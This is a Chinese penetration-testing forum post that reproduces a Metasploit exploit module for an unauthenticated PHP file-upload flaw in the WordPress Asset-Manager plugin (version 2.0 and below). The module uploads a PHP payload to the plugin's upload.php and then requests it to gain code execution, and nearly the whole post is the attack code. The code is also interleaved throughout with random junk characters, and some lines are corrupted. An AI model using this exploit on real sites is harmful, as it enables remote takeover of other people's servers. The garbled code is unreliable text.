中国网络渗透测试联盟

标题: WordPress Asset-Manager PHP文件上传漏洞 [打印本页]
作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。4 T+ Y) t: N! u5 r" V* L* u
- I* X, p6 G3 q9 i" i
##6 R$ d! D3 B1 ^+ {! L& J
# This file is part of the Metasploit Framework and may be subject to
7 B" s5 ~6 P# f/ F! W# redistribution and commercial restrictions. Please see the Metasploit
& }; W" b9 e5 a; ?7 M) l* j  ~# Framework web site for more information on licensing and terms of use.
+ S3 h) d! \% W% E2 i" c! k#   http://metasploit.com/framework/# o" d0 k; d6 [( y2 l7 S
##
* m+ n" M8 x" N% Y ' n  d+ e( l  l8 v9 l
require 'msf/core'
: j; ]9 ^" z* q4 ^4 o! x6 prequire 'msf/core/exploit/php_exe'
& p; k/ l4 {% q/ S' S6 C 4 M, K. s4 Y6 x% X/ n/ o
class Metasploit3 < Msf::Exploit::Remote6 M" [# Y% F6 W" ?
  Rank = ExcellentRanking
: ^" p. L! w' `( P4 d2 N; t3 u
7 Y6 b- l8 T: v  include Msf::Exploit::Remote::HttpClient8 v+ i0 {5 o: u2 Z2 J( e0 [
  include Msf::Exploit:hpEXE
5 P( K" U5 s8 m  A8 ~0 {
6 v2 |  m2 e  o5 P0 d  def initialize(info = {})
* N. F" i2 [4 n/ x( Q7 l/ U; u: I    super(update_info(info,
; O- ]+ U% T: N7 I. s% ?5 h      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
9 H3 i; n- A. N0 _6 C2 |      'Description'    => %q{
. R, F' f4 t# S8 T" K/ k1 V        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress* X) i+ k  W2 a; r
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
) y# [' I7 E& s0 j5 d        temp directory without authentication, which results in arbitrary code execution.
  c* y6 X  X8 x. U      },
" `) _8 v5 C. i      'Author'         =>
9 W; u- ?6 [' y7 P        [" p4 b+ C4 F2 @+ h2 T1 @' o8 _5 u5 o
          'Sammy FORGIT', # initial discovery
! s: p& s- L- I7 ]5 A: _* a9 G          'James Fitts <fitts.james[at]gmail.com>' # metasploit module: f8 @; H) l: A& @
        ],
1 _6 Q3 S% M3 M! o      'License'        => MSF_LICENSE,
1 H# m+ B; ~0 a$ X* l' a      'References'     =>
$ a% j+ Q6 K$ E3 X3 u! ]2 j        [
! p2 [7 G: z# I, T( d9 Q3 m          [ 'OSVDB', '82653' ],3 s! e+ a* U: E8 [
          [ 'BID', '53809' ],+ f0 N( t$ g$ g5 P, p) q- n
          [ 'EDB', '18993' ],' m5 W' W3 U1 R4 P
          [ 'URL', 'http:// www.myhack58.com /' ]
, A3 t' i; W; d& f+ J5 ~6 r9 l( w$ x        ],
$ \* o+ H  y6 G* T      'Payload'       =>
2 f6 U4 _7 v! H' l3 b5 g" }' |* x        {6 Q' d: W9 {/ B4 x; i  {
          'BadChars' => "\x00",/ M' \- f/ s% n2 F5 \- w" g$ a
        },
/ i0 t8 j8 G; o      'Platform'       => 'php',3 L8 [. O  O4 O! U6 F# S
      'Arch'           => ARCH_PHP," n+ S: ?& h& z. j0 C! v) G. ?: l
      'Targets'        =>
2 }, L& {3 ?. o1 X+ r; a        [8 I8 o9 J# x) c: a1 x+ h
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
2 V- \2 `& n/ U. B. F          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]  N1 i' _) i! I9 ~4 [) \
        ],+ r. V, x2 }4 O+ o% d
      'DefaultTarget' => 0,
0 S' w9 X; D  @4 [& m      'DisclosureDate' => 'May 26 2012'))
6 n* u' L* q* M6 k8 @ . [2 N% Y1 w' t' [* d
    register_options(
+ `; n& q; ~: {9 u7 r) k      [6 O* g* U$ K! L
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
. {: F% s+ T5 c+ {/ ?+ S" y( M" S      ], self.class)
$ {0 Y. ^8 }/ ^+ z6 b' ]/ o  end
  V4 k5 {0 d' L
1 k" s8 T/ J$ ]$ u3 n- z7 u  def exploit
5 [1 [  i) D  }2 E* W6 p    uri =  target_uri.path
1 w" C5 ]6 x7 h- `' b( y    uri << '/' if uri[-1,1] != '/'
4 d8 H3 W% U/ U0 U5 z$ A. W    peer = "#{rhost}:#{rport}"1 Y( ]4 p9 l) i5 B' w) S
    payload_name = "#{rand_text_alpha(5)}.php"
: n: I4 p# w' w5 `6 ?2 _4 X" ]; i) }    php_payload = get_write_exec_payload(:unlink_self=>true)3 i- `5 b- @8 J+ |# j4 o- ]* w
. r* m* ~: x) q  a5 J
    data = Rex::MIME::Message.new2 C5 H! M4 Z. a  ?+ m$ X
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
. V0 d4 v% y7 j* U$ s    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+ b' P8 `% W! k  {! ~ 8 T9 Y" @8 ~& ?" z+ N
    print_status("#{peer} - Uploading payload #{payload_name}")
7 L* W" P) Z2 Q- I. W; \: V, O1 W6 f    res = send_request_cgi({& h8 D# _8 l  r" o
      'method'  => 'POST',
2 I. _& @, p+ Z4 O; d0 m+ A% t      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
/ M% A2 F6 N5 h5 U8 Z      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
8 b: Z- S* {! M; i8 M! _      'data'    => post_data: {" I+ x% i8 B8 o, E
    })
. [% W" T. {" b/ Q8 e2 ?% [
; w1 f  x3 L( x0 d. s    if not res or res.code != 200 or res.body !~ /#{payload_name}/
; ^- o6 `% ^4 {3 H& a4 W7 B5 g      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")" ~1 [" m2 w& |9 Y
end
2 |4 h( n( S  A% y3 ?
8 C$ g# _' l3 K9 ^% R8 Y9 B* L    print_status("#{peer} - Executing payload #{payload_name}")
! c3 r. Q1 X: D% s7 r% Z: D/ ]% |    res = send_request_raw({" k# ]7 V4 L7 i8 A# ^$ X
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",  f7 N- c# [. ^1 s+ a) Q
      'method'  => 'GET'
2 k" ]! l( D; r8 F    })
  M% K  ?' S5 Y/ a
' _* u" L8 h$ M6 i& e" s    if res and res.code != 200( v" i7 v, P8 W% \8 _  _* @* l& Y
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
1 x1 H, X6 r2 r& O3 I    end$ v, t1 ^. _- K. w! S0 F. \
  end  Z/ x5 x: C$ E" g/ F  Y/ Q
end/ y. R" X( N  b0 z




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2